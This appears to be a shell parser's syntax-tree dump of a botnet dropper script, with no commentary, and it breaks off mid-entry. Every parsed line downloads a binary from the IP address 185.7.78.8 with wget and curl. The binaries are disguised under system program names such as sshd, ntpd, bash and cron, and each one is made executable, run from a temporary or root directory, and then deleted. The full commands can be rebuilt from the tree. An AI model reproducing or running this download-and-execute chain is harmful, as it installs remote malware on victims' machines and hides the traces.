ListNode(lineno=2, pos=(12, 162), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 94), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 94), word='http://185.7.78.8/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(94, 95)),
  CommandNode(lineno=2, pos=(96, 126), parts=[
    WordNode(lineno=2, pos=(96, 100), word='curl'),
    WordNode(lineno=2, pos=(101, 103), word='-O'),
    WordNode(lineno=2, pos=(104, 126), word='http://185.7.78.8/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(126, 127)),
  CommandNode(lineno=2, pos=(128, 141), parts=[
    WordNode(lineno=2, pos=(128, 133), word='chmod'),
    WordNode(lineno=2, pos=(134, 136), word='+x'),
    WordNode(lineno=2, pos=(137, 141), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(141, 142)),
  CommandNode(lineno=2, pos=(143, 149), parts=[
    WordNode(lineno=2, pos=(143, 149), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(149, 150)),
  CommandNode(lineno=2, pos=(151, 162), parts=[
    WordNode(lineno=2, pos=(151, 153), word='rm'),
    WordNode(lineno=2, pos=(154, 157), word='-rf'),
    WordNode(lineno=2, pos=(158, 162), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(163, 313), parts=[
  CommandNode(lineno=3, pos=(163, 170), parts=[
    WordNode(lineno=3, pos=(163, 165), word='cd'),
    WordNode(lineno=3, pos=(166, 170), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(171, 173)),
  CommandNode(lineno=3, pos=(174, 185), parts=[
    WordNode(lineno=3, pos=(174, 176), word='cd'),
    WordNode(lineno=3, pos=(177, 185), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(186, 188)),
  CommandNode(lineno=3, pos=(189, 196), parts=[
    WordNode(lineno=3, pos=(189, 191), word='cd'),
    WordNode(lineno=3, pos=(192, 196), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(197, 199)),
  CommandNode(lineno=3, pos=(200, 208), parts=[
    WordNode(lineno=3, pos=(200, 202), word='cd'),
    WordNode(lineno=3, pos=(203, 208), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(209, 211)),
  CommandNode(lineno=3, pos=(212, 216), parts=[
    WordNode(lineno=3, pos=(212, 214), word='cd'),
    WordNode(lineno=3, pos=(215, 216), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(216, 217)),
  CommandNode(lineno=3, pos=(218, 245), parts=[
    WordNode(lineno=3, pos=(218, 222), word='wget'),
    WordNode(lineno=3, pos=(223, 245), word='http://185.7.78.8/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(245, 246)),
  CommandNode(lineno=3, pos=(247, 277), parts=[
    WordNode(lineno=3, pos=(247, 251), word='curl'),
    WordNode(lineno=3, pos=(252, 254), word='-O'),
    WordNode(lineno=3, pos=(255, 277), word='http://185.7.78.8/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(277, 278)),
  CommandNode(lineno=3, pos=(279, 292), parts=[
    WordNode(lineno=3, pos=(279, 284), word='chmod'),
    WordNode(lineno=3, pos=(285, 287), word='+x'),
    WordNode(lineno=3, pos=(288, 292), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(292, 293)),
  CommandNode(lineno=3, pos=(294, 300), parts=[
    WordNode(lineno=3, pos=(294, 300), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(300, 301)),
  CommandNode(lineno=3, pos=(302, 313), parts=[
    WordNode(lineno=3, pos=(302, 304), word='rm'),
    WordNode(lineno=3, pos=(305, 308), word='-rf'),
    WordNode(lineno=3, pos=(309, 313), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(314, 479), parts=[
  CommandNode(lineno=4, pos=(314, 321), parts=[
    WordNode(lineno=4, pos=(314, 316), word='cd'),
    WordNode(lineno=4, pos=(317, 321), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(322, 324)),
  CommandNode(lineno=4, pos=(325, 336), parts=[
    WordNode(lineno=4, pos=(325, 327), word='cd'),
    WordNode(lineno=4, pos=(328, 336), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(337, 339)),
  CommandNode(lineno=4, pos=(340, 347), parts=[
    WordNode(lineno=4, pos=(340, 342), word='cd'),
    WordNode(lineno=4, pos=(343, 347), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(348, 350)),
  CommandNode(lineno=4, pos=(351, 359), parts=[
    WordNode(lineno=4, pos=(351, 353), word='cd'),
    WordNode(lineno=4, pos=(354, 359), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(360, 362)),
  CommandNode(lineno=4, pos=(363, 367), parts=[
    WordNode(lineno=4, pos=(363, 365), word='cd'),
    WordNode(lineno=4, pos=(366, 367), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(367, 368)),
  CommandNode(lineno=4, pos=(369, 399), parts=[
    WordNode(lineno=4, pos=(369, 373), word='wget'),
    WordNode(lineno=4, pos=(374, 399), word='http://185.7.78.8/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(399, 400)),
  CommandNode(lineno=4, pos=(401, 434), parts=[
    WordNode(lineno=4, pos=(401, 405), word='curl'),
    WordNode(lineno=4, pos=(406, 408), word='-O'),
    WordNode(lineno=4, pos=(409, 434), word='http://185.7.78.8/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(434, 435)),
  CommandNode(lineno=4, pos=(436, 452), parts=[
    WordNode(lineno=4, pos=(436, 441), word='chmod'),
    WordNode(lineno=4, pos=(442, 444), word='+x'),
    WordNode(lineno=4, pos=(445, 452), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(452, 453)),
  CommandNode(lineno=4, pos=(454, 463), parts=[
    WordNode(lineno=4, pos=(454, 463), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(463, 464)),
  CommandNode(lineno=4, pos=(465, 479), parts=[
    WordNode(lineno=4, pos=(465, 467), word='rm'),
    WordNode(lineno=4, pos=(468, 471), word='-rf'),
    WordNode(lineno=4, pos=(472, 479), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(480, 630), parts=[
  CommandNode(lineno=5, pos=(480, 487), parts=[
    WordNode(lineno=5, pos=(480, 482), word='cd'),
    WordNode(lineno=5, pos=(483, 487), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(488, 490)),
  CommandNode(lineno=5, pos=(491, 502), parts=[
    WordNode(lineno=5, pos=(491, 493), word='cd'),
    WordNode(lineno=5, pos=(494, 502), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(503, 505)),
  CommandNode(lineno=5, pos=(506, 513), parts=[
    WordNode(lineno=5, pos=(506, 508), word='cd'),
    WordNode(lineno=5, pos=(509, 513), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(514, 516)),
  CommandNode(lineno=5, pos=(517, 525), parts=[
    WordNode(lineno=5, pos=(517, 519), word='cd'),
    WordNode(lineno=5, pos=(520, 525), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(526, 528)),
  CommandNode(lineno=5, pos=(529, 533), parts=[
    WordNode(lineno=5, pos=(529, 531), word='cd'),
    WordNode(lineno=5, pos=(532, 533), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(533, 534)),
  CommandNode(lineno=5, pos=(535, 562), parts=[
    WordNode(lineno=5, pos=(535, 539), word='wget'),
    WordNode(lineno=5, pos=(540, 562), word='http://185.7.78.8/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(562, 563)),
  CommandNode(lineno=5, pos=(564, 594), parts=[
    WordNode(lineno=5, pos=(564, 568), word='curl'),
    WordNode(lineno=5, pos=(569, 571), word='-O'),
    WordNode(lineno=5, pos=(572, 594), word='http://185.7.78.8/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(594, 595)),
  CommandNode(lineno=5, pos=(596, 609), parts=[
    WordNode(lineno=5, pos=(596, 601), word='chmod'),
    WordNode(lineno=5, pos=(602, 604), word='+x'),
    WordNode(lineno=5, pos=(605, 609), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(609, 610)),
  CommandNode(lineno=5, pos=(611, 617), parts=[
    WordNode(lineno=5, pos=(611, 617), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(617, 618)),
  CommandNode(lineno=5, pos=(619, 630), parts=[
    WordNode(lineno=5, pos=(619, 621), word='rm'),
    WordNode(lineno=5, pos=(622, 625), word='-rf'),
    WordNode(lineno=5, pos=(626, 630), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(631, 781), parts=[
  CommandNode(lineno=6, pos=(631, 638), parts=[
    WordNode(lineno=6, pos=(631, 633), word='cd'),
    WordNode(lineno=6, pos=(634, 638), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(639, 641)),
  CommandNode(lineno=6, pos=(642, 653), parts=[
    WordNode(lineno=6, pos=(642, 644), word='cd'),
    WordNode(lineno=6, pos=(645, 653), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(654, 656)),
  CommandNode(lineno=6, pos=(657, 664), parts=[
    WordNode(lineno=6, pos=(657, 659), word='cd'),
    WordNode(lineno=6, pos=(660, 664), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(665, 667)),
  CommandNode(lineno=6, pos=(668, 676), parts=[
    WordNode(lineno=6, pos=(668, 670), word='cd'),
    WordNode(lineno=6, pos=(671, 676), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(677, 679)),
  CommandNode(lineno=6, pos=(680, 684), parts=[
    WordNode(lineno=6, pos=(680, 682), word='cd'),
    WordNode(lineno=6, pos=(683, 684), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(684, 685)),
  CommandNode(lineno=6, pos=(686, 713), parts=[
    WordNode(lineno=6, pos=(686, 690), word='wget'),
    WordNode(lineno=6, pos=(691, 713), word='http://185.7.78.8/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(713, 714)),
  CommandNode(lineno=6, pos=(715, 745), parts=[
    WordNode(lineno=6, pos=(715, 719), word='curl'),
    WordNode(lineno=6, pos=(720, 722), word='-O'),
    WordNode(lineno=6, pos=(723, 745), word='http://185.7.78.8/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(745, 746)),
  CommandNode(lineno=6, pos=(747, 760), parts=[
    WordNode(lineno=6, pos=(747, 752), word='chmod'),
    WordNode(lineno=6, pos=(753, 755), word='+x'),
    WordNode(lineno=6, pos=(756, 760), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(760, 761)),
  CommandNode(lineno=6, pos=(762, 768), parts=[
    WordNode(lineno=6, pos=(762, 768), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(768, 769)),
  CommandNode(lineno=6, pos=(770, 781), parts=[
    WordNode(lineno=6, pos=(770, 772), word='rm'),
    WordNode(lineno=6, pos=(773, 776), word='-rf'),
    WordNode(lineno=6, pos=(777, 781), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(782, 932), parts=[
  CommandNode(lineno=7, pos=(782, 789), parts=[
    WordNode(lineno=7, pos=(782, 784), word='cd'),
    WordNode(lineno=7, pos=(785, 789), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(790, 792)),
  CommandNode(lineno=7, pos=(793, 804), parts=[
    WordNode(lineno=7, pos=(793, 795), word='cd'),
    WordNode(lineno=7, pos=(796, 804), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(805, 807)),
  CommandNode(lineno=7, pos=(808, 815), parts=[
    WordNode(lineno=7, pos=(808, 810), word='cd'),
    WordNode(lineno=7, pos=(811, 815), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(816, 818)),
  CommandNode(lineno=7, pos=(819, 827), parts=[
    WordNode(lineno=7, pos=(819, 821), word='cd'),
    WordNode(lineno=7, pos=(822, 827), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(828, 830)),
  CommandNode(lineno=7, pos=(831, 835), parts=[
    WordNode(lineno=7, pos=(831, 833), word='cd'),
    WordNode(lineno=7, pos=(834, 835), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(835, 836)),
  CommandNode(lineno=7, pos=(837, 864), parts=[
    WordNode(lineno=7, pos=(837, 841), word='wget'),
    WordNode(lineno=7, pos=(842, 864), word='http://185.7.78.8/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(864, 865)),
  CommandNode(lineno=7, pos=(866, 896), parts=[
    WordNode(lineno=7, pos=(866, 870), word='curl'),
    WordNode(lineno=7, pos=(871, 873), word='-O'),
    WordNode(lineno=7, pos=(874, 896), word='http://185.7.78.8/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(896, 897)),
  CommandNode(lineno=7, pos=(898, 911), parts=[
    WordNode(lineno=7, pos=(898, 903), word='chmod'),
    WordNode(lineno=7, pos=(904, 906), word='+x'),
    WordNode(lineno=7, pos=(907, 911), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(911, 912)),
  CommandNode(lineno=7, pos=(913, 919), parts=[
    WordNode(lineno=7, pos=(913, 919), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(919, 920)),
  CommandNode(lineno=7, pos=(921, 932), parts=[
    WordNode(lineno=7, pos=(921, 923), word='rm'),
    WordNode(lineno=7, pos=(924, 927), word='-rf'),
    WordNode(lineno=7, pos=(928, 932), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(933, 1083), parts=[
  CommandNode(lineno=8, pos=(933, 940), parts=[
    WordNode(lineno=8, pos=(933, 935), word='cd'),
    WordNode(lineno=8, pos=(936, 940), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(941, 943)),
  CommandNode(lineno=8, pos=(944, 955), parts=[
    WordNode(lineno=8, pos=(944, 946), word='cd'),
    WordNode(lineno=8, pos=(947, 955), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(956, 958)),
  CommandNode(lineno=8, pos=(959, 966), parts=[
    WordNode(lineno=8, pos=(959, 961), word='cd'),
    WordNode(lineno=8, pos=(962, 966), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(967, 969)),
  CommandNode(lineno=8, pos=(970, 978), parts=[
    WordNode(lineno=8, pos=(970, 972), word='cd'),
    WordNode(lineno=8, pos=(973, 978), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(979, 981)),
  CommandNode(lineno=8, pos=(982, 986), parts=[
    WordNode(lineno=8, pos=(982, 984), word='cd'),
    WordNode(lineno=8, pos=(985, 986), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(986, 987)),
  CommandNode(lineno=8, pos=(988, 1015), parts=[
    WordNode(lineno=8, pos=(988, 992), word='wget'),
    WordNode(lineno=8, pos=(993, 1015), word='http://185.7.78.8/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1015, 1016)),
  CommandNode(lineno=8, pos=(1017, 1047), parts=[
    WordNode(lineno=8, pos=(1017, 1021), word='curl'),
    WordNode(lineno=8, pos=(1022, 1024), word='-O'),
    WordNode(lineno=8, pos=(1025, 1047), word='http://185.7.78.8/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1047, 1048)),
  CommandNode(lineno=8, pos=(1049, 1062), parts=[
    WordNode(lineno=8, pos=(1049, 1054), word='chmod'),
    WordNode(lineno=8, pos=(1055, 1057), word='+x'),
    WordNode(lineno=8, pos=(1058, 1062), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1062, 1063)),
  CommandNode(lineno=8, pos=(1064, 1070), parts=[
    WordNode(lineno=8, pos=(1064, 1070), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1070, 1071)),
  CommandNode(lineno=8, pos=(1072, 1083), parts=[
    WordNode(lineno=8, pos=(1072, 1074), word='rm'),
    WordNode(lineno=8, pos=(1075, 1078), word='-rf'),
    WordNode(lineno=8, pos=(1079, 1083), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(1084, 1229), parts=[
  CommandNode(lineno=9, pos=(1084, 1091), parts=[
    WordNode(lineno=9, pos=(1084, 1086), word='cd'),
    WordNode(lineno=9, pos=(1087, 1091), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1092, 1094)),
  CommandNode(lineno=9, pos=(1095, 1106), parts=[
    WordNode(lineno=9, pos=(1095, 1097), word='cd'),
    WordNode(lineno=9, pos=(1098, 1106), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1107, 1109)),
  CommandNode(lineno=9, pos=(1110, 1117), parts=[
    WordNode(lineno=9, pos=(1110, 1112), word='cd'),
    WordNode(lineno=9, pos=(1113, 1117), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1118, 1120)),
  CommandNode(lineno=9, pos=(1121, 1129), parts=[
    WordNode(lineno=9, pos=(1121, 1123), word='cd'),
    WordNode(lineno=9, pos=(1124, 1129), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1130, 1132)),
  CommandNode(lineno=9, pos=(1133, 1137), parts=[
    WordNode(lineno=9, pos=(1133, 1135), word='cd'),
    WordNode(lineno=9, pos=(1136, 1137), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1137, 1138)),
  CommandNode(lineno=9, pos=(1139, 1165), parts=[
    WordNode(lineno=9, pos=(1139, 1143), word='wget'),
    WordNode(lineno=9, pos=(1144, 1165), word='http://185.7.78.8/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1165, 1166)),
  CommandNode(lineno=9, pos=(1167, 1196), parts=[
    WordNode(lineno=9, pos=(1167, 1171), word='curl'),
    WordNode(lineno=9, pos=(1172, 1174), word='-O'),
    WordNode(lineno=9, pos=(1175, 1196), word='http://185.7.78.8/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1196, 1197)),
  CommandNode(lineno=9, pos=(1198, 1210), parts=[
    WordNode(lineno=9, pos=(1198, 1203), word='chmod'),
    WordNode(lineno=9, pos=(1204, 1206), word='+x'),
    WordNode(lineno=9, pos=(1207, 1210), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1210, 1211)),
  CommandNode(lineno=9, pos=(1212, 1217), parts=[
    WordNode(lineno=9, pos=(1212, 1217), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1217, 1218)),
  CommandNode(lineno=9, pos=(1219, 1229), parts=[
    WordNode(lineno=9, pos=(1219, 1221), word='rm'),
    WordNode(lineno=9, pos=(1222, 1225), word='-rf'),
    WordNode(lineno=9, pos=(1226, 1229), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1230, 1380), parts=[
  CommandNode(lineno=10, pos=(1230, 1237), parts=[
    WordNode(lineno=10, pos=(1230, 1232), word='cd'),
    WordNode(lineno=10, pos=(1233, 1237), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1238, 1240)),
  CommandNode(lineno=10, pos=(1241, 1252), parts=[
    WordNode(lineno=10, pos=(1241, 1243), word='cd'),
    WordNode(lineno=10, pos=(1244, 1252), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1253, 1255)),
  CommandNode(lineno=10, pos=(1256, 1263), parts=[
    WordNode(lineno=10, pos=(1256, 1258), word='cd'),
    WordNode(lineno=10, pos=(1259, 1263), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1264, 1266)),
  CommandNode(lineno=10, pos=(1267, 1275), parts=[
    WordNode(lineno=10, pos=(1267, 1269), word='cd'),
    WordNode(lineno=10, pos=(1270, 1275), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1276, 1278)),
  CommandNode(lineno=10, pos=(1279, 1283), parts=[
    WordNode(lineno=10, pos=(1279, 1281), word='cd'),
    WordNode(lineno=10, pos=(1282, 1283), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1283, 1284)),
  CommandNode(lineno=10, pos=(1285, 1312), parts=[
    WordNode(lineno=10, pos=(1285, 1289), word='wget'),
    WordNode(lineno=10, pos=(1290, 1312), word='http://185.7.78.8/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1312, 1313)),
  CommandNode(lineno=10, pos=(1314, 1344), parts=[
    WordNode(lineno=10, pos=(1314, 1318), word='curl'),
    WordNode(lineno=10, pos=(1319, 1321), word='-O'),
    WordNode(lineno=10, pos=(1322, 1344), word='http://185.7.78.8/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1344, 1345)),
  CommandNode(lineno=10, pos=(1346, 1359), parts=[
    WordNode(lineno=10, pos=(1346, 1351), word='chmod'),
    WordNode(lineno=10, pos=(1352, 1354), word='+x'),
    WordNode(lineno=10, pos=(1355, 1359), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1359, 1360)),
  CommandNode(lineno=10, pos=(1361, 1367), parts=[
    WordNode(lineno=10, pos=(1361, 1367), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1367, 1368)),
  CommandNode(lineno=10, pos=(1369, 1380), parts=[
    WordNode(lineno=10, pos=(1369, 1371), word='rm'),
    WordNode(lineno=10, pos=(1372, 1375), word='-rf'),
    WordNode(lineno=10, pos=(1376, 1380), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1381, 1521), parts=[
  CommandNode(lineno=11, pos=(1381, 1388), parts=[
    WordNode(lineno=11, pos=(1381, 1383), word='cd'),
    WordNode(lineno=11, pos=(1384, 1388), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1389, 1391)),
  CommandNode(lineno=11, pos=(1392, 1403), parts=[
    WordNode(lineno=11, pos=(1392, 1394), word='cd'),
    WordNode(lineno=11, pos=(1395, 1403), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1404, 1406)),
  CommandNode(lineno=11, pos=(1407, 1414), parts=[
    WordNode(lineno=11, pos=(1407, 1409), word='cd'),
    WordNode(lineno=11, pos=(1410, 1414), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1415, 1417)),
  CommandNode(lineno=11, pos=(1418, 1426), parts=[
    WordNode(lineno=11, pos=(1418, 1420), word='cd'),
    WordNode(lineno=11, pos=(1421, 1426), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1427, 1429)),
  CommandNode(lineno=11, pos=(1430, 1434), parts=[
    WordNode(lineno=11, pos=(1430, 1432), word='cd'),
    WordNode(lineno=11, pos=(1433, 1434), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1434, 1435)),
  CommandNode(lineno=11, pos=(1436, 1461), parts=[
    WordNode(lineno=11, pos=(1436, 1440), word='wget'),
    WordNode(lineno=11, pos=(1441, 1461), word='http://185.7.78.8/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1461, 1462)),
  CommandNode(lineno=11, pos=(1463, 1491), parts=[
    WordNode(lineno=11, pos=(1463, 1467), word='curl'),
    WordNode(lineno=11, pos=(1468, 1470), word='-O'),
    WordNode(lineno=11, pos=(1471, 1491), word='http://185.7.78.8/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1491, 1492)),
  CommandNode(lineno=11, pos=(1493, 1504), parts=[
    WordNode(lineno=11, pos=(1493, 1498), word='chmod'),
    WordNode(lineno=11, pos=(1499, 1501), word='+x'),
    WordNode(lineno=11, pos=(1502, 1504), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1504, 1505)),
  CommandNode(lineno=11, pos=(1506, 1510), parts=[
    WordNode(lineno=11, pos=(1506, 1510), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1510, 1511)),
  CommandNode(lineno=11, pos=(1512, 1521), parts=[
    WordNode(lineno=11, pos=(1512, 1514), word='rm'),
    WordNode(lineno=11, pos=(1515, 1518), word='-rf'),
    WordNode(lineno=11, pos=(1519, 1521), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1522, 1667), parts=[
  CommandNode(lineno=12, pos=(1522, 1529), parts=[
    WordNode(lineno=12, pos=(1522, 1524), word='cd'),
    WordNode(lineno=12, pos=(1525, 1529), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1530, 1532)),
  CommandNode(lineno=12, pos=(1533, 1544), parts=[
    WordNode(lineno=12, pos=(1533, 1535), word='cd'),
    WordNode(lineno=12, pos=(1536, 1544), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1545, 1547)),
  CommandNode(lineno=12, pos=(1548, 1555), parts=[
    WordNode(lineno=12, pos=(1548, 1550), word='cd'),
    WordNode(lineno=12, pos=(1551, 1555), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1556, 1558)),
  CommandNode(lineno=12, pos=(1559, 1567), parts=[
    WordNode(lineno=12, pos=(1559, 1561), word='cd'),
    WordNode(lineno=12, pos=(1562, 1567), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1568, 1570)),
  CommandNode(lineno=12, pos=(1571, 1575), parts=[
    WordNode(lineno=12, pos=(1571, 1573), word='cd'),
    WordNode(lineno=12, pos=(1574, 1575), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1575, 1576)),
  CommandNode(lineno=12, pos=(1577, 1603), parts=[
    WordNode(lineno=12, pos=(1577, 1581), word='wget'),
    WordNode(lineno=12, pos=(1582, 1603), word='http://185.7.78.8/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1603, 1604)),
  CommandNode(lineno=12, pos=(1605, 1634), parts=[
    WordNode(lineno=12, pos=(1605, 1609), word='curl'),
    WordNode(lineno=12, pos=(1610, 1612), word='-O'),
    WordNode(lineno=12, pos=(1613, 1634), word='http://185.7.78.8/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1634, 1635)),
  CommandNode(lineno=12, pos=(1636, 1648), parts=[
    WordNode(lineno=12, pos=(1636, 1641), word='chmod'),
    WordNode(lineno=12, pos=(1642, 1644), word='+x'),
    WordNode(lineno=12, pos=(1645, 1648), word='nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1648, 1649)),
  CommandNode(lineno=12, pos=(1650, 1655), parts=[
    WordNode(lineno=12, pos=(1650, 1655), word='./nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1655, 1656)),
  CommandNode(lineno=12, pos=(1657, 1667), parts=[
    WordNode(lineno=12, pos=(1657, 1659), word='rm'),
    WordNode(lineno=12, pos=(1660, 1663), word='-rf'),
    WordNode(lineno=12, pos=(1664, 1667), word='nut'),
  ]),
])
ListNode(lineno=13, pos=(1668, 1833), parts=[
  CommandNode(lineno=13, pos=(1668, 1675), parts=[
    WordNode(lineno=13, pos=(1668, 1670), word='cd'),
    WordNode(lineno=13, pos=(1671, 1675), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1676, 1678)),
  CommandNode(lineno=13, pos=(1679, 1690), parts=[
    WordNode(lineno=13, pos=(1679, 1681), word='cd'),
    WordNode(lineno=13, pos=(1682, 1690), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1691, 1693)),
  CommandNode(lineno=13, pos=(1694, 1701), parts=[
    WordNode(lineno=13, pos=(1694, 1696), word='cd'),
    WordNode(lineno=13, pos=(1697, 1701), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1702, 1704)),
  CommandNode(lineno=13, pos=(1705, 1713), parts=[
    WordNode(lineno=13, pos=(1705, 1707), word='cd'),
    WordNode(lineno=13, pos=(1708, 1713), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1714, 1716)),
  CommandNode(lineno=13, pos=(1717, 1721), parts=[
    WordNode(lineno=13, pos=(1717, 1719), word='cd'),
    WordNode(lineno=13, pos=(1720, 1721), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1721, 1722)),
  CommandNode(lineno=13, pos=(1723, 1753), parts=[
    WordNode(lineno=13, pos=(1723, 1727), word='wget'),
    WordNode(lineno=13, pos=(1728, 1753), word='http://185.7.78.8/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1753, 1754)),
